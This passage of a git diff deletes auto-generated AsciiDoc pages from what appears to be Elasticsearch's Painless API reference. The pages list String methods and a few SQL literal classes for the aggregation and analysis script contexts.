{java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc deleted file mode 100644 index 6fcf22ba13d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-init]] -=== Aggs Init API - -The following specialized API is available in the Aggs Init context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc deleted file mode 100644 index c54209d9835..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-init-java-lang"] -=== Aggs Init API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-init-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc deleted file mode 100644 index 2a92287889f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-map]] -=== Aggs Map API - -The following specialized API is available in the Aggs Map context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc deleted file mode 100644 index 1cbdc72c725..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-map-java-lang"] -=== Aggs Map API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-map-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc deleted file mode 100644 index ada5a7ffb2f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-reduce]] -=== Aggs Reduce API - -The following specialized API is available in the Aggs Reduce context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc deleted file mode 100644 index 4ef0fd11334..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-reduce-java-lang"] -=== Aggs Reduce API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-reduce-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc deleted file mode 100644 index 9cfe9531fab..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs]] -=== Aggs API - -The following specialized API is available in the Aggs context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc deleted file mode 100644 index 3213ce2dbf6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-java-lang"] -=== Aggs API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-aggs-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Aggs API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-aggs-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Aggs API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-aggs-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc deleted file mode 100644 index 491bc49ae06..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-analysis]] -=== Analysis API - -The following specialized API is available in the Analysis context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.analysis.common -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc deleted file mode 100644 index b5052084ee0..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-analysis/packages.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-analysis-java-lang"] -=== Analysis API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-analysis-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int 